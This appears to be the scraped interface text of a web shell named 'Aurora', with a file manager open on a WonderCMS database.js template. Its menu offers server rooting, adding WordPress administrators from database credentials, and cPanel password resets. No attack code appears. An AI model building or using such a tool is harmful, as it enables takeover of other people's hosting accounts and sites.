Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
var
softaculous
wonder
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: database.js
{ "config": { "siteTitle": "[[site_name]]", "siteLang": "en", "adminLang": "en", "theme": "sky", "defaultPage": "home", "login": "[[admin_loginURL]]", "forceLogout": false, "forceHttps": false, "saveChangesPopup": false, "modalPersistence": false, "logoutToLoginScreen": true, "password": "[[admin_pass]]", "lastLogins": {}, "lastModulesSync": null, "customModules": { "themes": {}, "plugins": {} }, "menuItems": { "0": { "name": "Home", "slug": "home", "visibility": "show", "subpages": {} }, "1": { "name": "How to", "slug": "how-to", "visibility": "show", "subpages": {} } } }, "pages": { "404": { "created": "[[date_created]]", "modified": "[[date_modified]]", "visibility": "show", "title": "404", "keywords": "404", "description": "404", "content": "<center><h1>404 - Page not found<\/h1><\/center>", "subpages": {} }, "home": { "created": "[[date_created]]", "modified": "[[date_modified]]", "visibility": "show", "title": "Home", "keywords": "Enter, page, keywords, for, search, engines", "description": "A page description is also good for search engines.", "content": "<h1>Welcome to your website<\/h1>\n\n<p><a href=\"[[loginURL]]\" class=\"button\">Click here to login<\/a><\/p>\n\n<p>To install an awesome editor, open Settings\/Plugins and click Install Summernote.<\/p>", "subpages": {} }, "how-to": { "created": "[[date_created]]", "modified": "[[date_modified]]", "visibility": "show", "title": "How to", "keywords": "Enter, keywords, for, this page", "description": "A page description is also good for search engines.", "content": "<h2>Easy editing<\/h2>\n<p>After logging in, click anywhere to edit and click outside to save. Changes are live immediately.<\/p>\n\n<h2>Create new page<\/h2>\n<p>Pages can be created in Settings.<\/p>\n\n<h2>Start a blog or change your theme<\/h2>\n<p>To install, update or remove themes\/plugins, visit Settings.<\/p>\n\n<h2><b>Support WonderCMS<\/b><\/h2>\n<p>WonderCMS has been free for over 18 years.<br>\n<a href=\"https:\/\/www.wondercms.com\/donate\" target=\"_blank\">Click here to buy us a coffee<\/a> or <a href=\"https:\/\/swag.wondercms.com\" target=\"_blank\">get an amazing WonderCMS t-shirt<\/a>.<\/p>", "subpages": {} } }, "blocks": { "subside": { "content": "<h2>About your website<\/h2>\n\n<br>\n<p>Website description, contact form, mini map or anything else.<\/p>\n<p>This editable area is visible on all pages.<\/p>" }, "header": { "content": "<nav>You can include this in your theme.php and edit it.<\/nav>" }, "footer": { "content": "©2026 Your website" } } }